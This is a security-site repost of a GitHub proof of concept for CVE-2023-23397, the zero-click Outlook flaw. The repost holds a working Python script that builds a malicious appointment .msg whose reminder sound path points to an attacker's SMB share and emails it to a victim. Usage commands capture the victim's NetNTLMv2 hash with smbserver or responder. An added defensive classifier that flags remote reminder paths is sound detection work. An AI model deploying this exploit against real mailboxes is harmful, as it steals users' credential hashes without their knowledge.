A simple PoC for the CVE-2023-23397 vulnerability whose payload is delivered by email.

Author: Sec-Labs | Published:

Project URL

https://github.com/Trackflaw/CVE-2023-23397

CVE-2023-23397

A quick and dirty PoC for CVE-2023-23397, which affects Outlook clients.

Description

Outlook does not validate the user-supplied value that configures the reminder sound for meetings and appointments. As a result, an attacker can force the victim's client to connect to an attacker-controlled server without any action by the user (a zero-click vulnerability).

An attacker exploiting this vulnerability obtains, through an SMB request, the NetNTLMv2 hash derived from the trapped user's password. The request is triggered as soon as the email reaches the inbox.

What does the PoC do?

  1. Generate the malicious .msg payload.
  2. Send it by email through a custom SMTP server.
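The property that makes this exploitable is the appointment's reminder sound path (what the script below sets via reminder_sound_file) accepting a network location. The following is an added example, not code from the Trackflaw project or the source article: a Python classifier that flags reminder sound values pointing at a remote host, the check a mailbox scan or mail-gateway rule would apply when hunting for such items. The sample appointment items are constructed.

```python
import re

# Windows UNC form, including the WebDAV variants \\host@80\... and \\host@SSL\...
_UNC = re.compile(r"^\\\\([^\\/@]+)(?:@(?:\d+|SSL))*(?:[\\/]|$)", re.IGNORECASE)
# Generic scheme://host form (http://, file://, ...)
_URL = re.compile(r"^([a-z][a-z0-9+.\-]*)://([^/\\?#]*)", re.IGNORECASE)


def classify_reminder_path(value):
    """Classify a reminder sound path (the PidLidReminderFileParameter value).

    Returns ("remote", host) when the path would make Outlook reach out to a
    network host, otherwise ("local", None). An empty value means the default
    sound is used.
    """
    v = (value or "").strip()
    m = _UNC.match(v)
    if m:
        return ("remote", m.group(1).lower())
    m = _URL.match(v)
    if m:
        host = m.group(2).lower()
        # file:///C:/... has an empty authority and stays on the local machine
        return ("remote", host) if host else ("local", None)
    return ("local", None)


def flag_appointments(items):
    """Return (subject, host, override_set) for each item with a remote reminder path.

    `items` is an iterable of dicts with 'subject', 'reminder_override_default'
    and 'reminder_sound_file' keys, mirroring the properties the PoC sets.
    A remote value is flagged whether or not the override flag is set: there is
    no legitimate reason for it to be there.
    """
    hits = []
    for it in items:
        kind, host = classify_reminder_path(it.get("reminder_sound_file", ""))
        if kind == "remote":
            hits.append((it["subject"], host, bool(it.get("reminder_override_default"))))
    return hits


# Constructed sample items (not real mailbox data).
SAMPLE_ITEMS = [
    {"subject": "Team sync", "reminder_override_default": False, "reminder_sound_file": ""},
    {"subject": "Budget", "reminder_override_default": True, "reminder_sound_file": r"C:\Windows\Media\Alarm01.wav"},
    {"subject": "Hello There !", "reminder_override_default": True, "reminder_sound_file": r"\\10.0.0.5\SHARE\alarm.wav"},
    {"subject": "Review", "reminder_override_default": True, "reminder_sound_file": r"\\files.example.net@SSL\DavWWWRoot\a.wav"},
    {"subject": "Legacy", "reminder_override_default": False, "reminder_sound_file": r"\\old-host\share\x.wav"},
]

if __name__ == "__main__":
    for subject, host, override in flag_appointments(SAMPLE_ITEMS):
        print(f"[!] {subject!r}: reminder sound points to {host} (override set: {override})")
```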

CVE-2023-23397.py

import smtplib, datetime, argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.utils import COMMASPACE, formatdate
from independentsoft.msg import Message

# Mail configuration : change it !
smtp_server = "mail.example.com"
smtp_port = 587

sender_email = "attacker@mail.example.com"
sender_password = "P@ssw0rd"

recipients_email = ["victim@mail.example.com"]

class Email:
    def __init__(self, smtp_server, port, username, password, recipient):
        self.smtp_server = smtp_server
        self.port = port
        self.username = username
        self.password = password
        self.recipient = recipient

    def send(self, subject, body, attachment_path):
        msg = MIMEMultipart()
        msg['From'] = self.username
        msg['To'] = COMMASPACE.join(self.recipient)
        msg['Date'] = formatdate(localtime=True)
        msg['Subject'] = subject
        
        msg.attach(MIMEText(body))

        with open(attachment_path, 'rb') as f:
            part = MIMEApplication(f.read(), Name=attachment_path)
            part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
            msg.attach(part)

        try:
            server = smtplib.SMTP(self.smtp_server, self.port)
            server.starttls()
            server.login(self.username, self.password)
            server.sendmail(self.username, self.recipient, msg.as_string())
            server.quit()
            print("[+] Malicious appointment sent !")


        except Exception as e:
            print("[-] Error with SMTP server...", e)

parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
args = parser.parse_args()

appointment = Message()
appointment.message_class = "IPM.Appointment"
appointment.subject = "CVE-2023-23397"
appointment.body = "New meeting now !"
appointment.location = "Paris"
appointment.appointment_start_time = datetime.datetime.now()
appointment.appointment_end_time = datetime.datetime.now()
appointment.reminder_override_default = True
appointment.reminder_sound_file = args.path
appointment.save("appointment.msg")

email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)

subject = "Hello There !"
body = "Important appointment !"
email.send(subject, body, "appointment.msg")


Usage

In one session:

python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

In a second session (smbserver or responder, as needed):

smbserver.py -smb2support SHARE .


Demo (manual PoC)




Source article

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

Tags: tool sharing, PoC script